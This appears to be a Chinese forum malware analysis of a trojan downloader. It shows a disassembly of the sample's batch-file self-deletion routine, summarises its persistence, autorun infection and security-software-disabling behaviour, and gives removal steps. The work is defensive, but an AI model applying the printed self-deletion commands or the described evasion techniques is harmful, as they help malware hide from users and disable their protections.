0040555D |. E8 C6E2FFFF call down.00403828
00405562 |. 50 push eax ; |filename=C:\DOCUME~1\ADMINI~1\桌面\down.exe
00405563 |. E8 ACEBFFFF call down.00404114 ; \SetFileAttributesA
00405568 |. 8B55 FC mov edx,[local.1] ; "C:\WINDOWS\Deleteme.bat") 利用批处理进行自删除
0040556B |. 8D85 2CFEFFFF lea eax,[local.117]
00405571 |. E8 42D3FFFF call down.004028B8
00405576 |. 8D85 2CFEFFFF lea eax,[local.117]
0040557C |. E8 D3D0FFFF call down.00402654
00405581 |. E8 FACFFFFF call down.00402580
00405586 |. BA C0564000 mov edx,down.004056C0 ; ASCII ":try"
0040558B |. 8D85 2CFEFFFF lea eax,[local.117]
00405591 |. E8 26E4FFFF call down.004039BC
00405596 |. E8 39D6FFFF call down.00402BD4
0040559B |. E8 E0CFFFFF call down.00402580
004055A0 |. 68 D0564000 push down.004056D0 ; ASCII "del ""
004055A5 |. FF75 F8 push [local.2]
004055A8 |. 68 E0564000 push down.004056E0
004055AD |. 8D85 20FEFFFF lea eax,[local.120]
004055B3 |. BA 03000000 mov edx,3
004055B8 |. E8 2BE1FFFF call down.004036E8
004055BD |. 8B95 20FEFFFF mov edx,[local.120]
004055C3 |. 8D85 2CFEFFFF lea eax,[local.117]
004055C9 |. E8 EEE3FFFF call down.004039BC
004055CE |. E8 01D6FFFF call down.00402BD4
004055D3 |. E8 A8CFFFFF call down.00402580
004055D8 |. BA EC564000 mov edx,down.004056EC ; ASCII "ping -n 5 127.0.0.1>nul"
004055DD |. 8D85 2CFEFFFF lea eax,[local.117]
004055E3 |. E8 D4E3FFFF call down.004039BC
004055E8 |. E8 E7D5FFFF call down.00402BD4
004055ED |. E8 8ECFFFFF call down.00402580
004055F2 |. 68 0C574000 push down.0040570C ; ASCII "if exist ""
004055F7 |. FF75 F8 push [local.2]
004055FA |. 68 E0564000 push down.004056E0
004055FF |. 68 20574000 push down.00405720 ; ASCII " goto try"
00405604 |. 8D85 1CFEFFFF lea eax,[local.121]
0040560A |. BA 04000000 mov edx,4
0040560F |. E8 D4E0FFFF call down.004036E8
00405614 |. 8B95 1CFEFFFF mov edx,[local.121]
0040561A |. 8D85 2CFEFFFF lea eax,[local.117]
00405620 |. E8 97E3FFFF call down.004039BC
00405625 |. E8 AAD5FFFF call down.00402BD4
0040562A |. E8 51CFFFFF call down.00402580
0040562F |. BA 34574000 mov edx,down.00405734 ; ASCII "del %0"
00405634 |. 8D85 2CFEFFFF lea eax,[local.117]
0040563A |. E8 7DE3FFFF call down.004039BC
0040563F |. E8 90D5FFFF call down.00402BD4
00405644 |. E8 37CFFFFF call down.00402580
00405649 |. 8D85 2CFEFFFF lea eax,[local.117]
0040564F |. E8 20D3FFFF call down.00402974
00405654 |. E8 27CFFFFF call down.00402580
00405659 |. 6A 00 push 0
0040565B |. 8B45 FC mov eax,[local.1]
0040565E |. E8 C5E1FFFF call down.00403828
00405663 |. 50 push eax ; |CmdLine
00405664 |. E8 D3EAFFFF call down.0040413C ; \WinExec
大体流程:
1.获取卷标作为文件名,释放文件并修改文件属性。
2.通过修改注册表实现自启动,创建服务实现自启动。
3.修改注册表达到镜像劫持、隐藏特殊属性的文件。
4.打开服务控制管理器,停止安全相关服务,使安全软件失效;屏蔽安全模式,达到穿透还原的目的;枚举并修改所有自启动项。
5.遍历所有盘符进行autorun感染。
6.通过 dll hook 进行监视,关闭所有安全软件、防火墙及其驱动。
7.自删除。
本人如有分析不当之处,请高手多多指教。
查杀方法:
打开XueTr,转到自启动删除,服务启动项删除,
删除C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll和4634ED47.dat
删除每个盘符autorun.inf以及生成的dll文件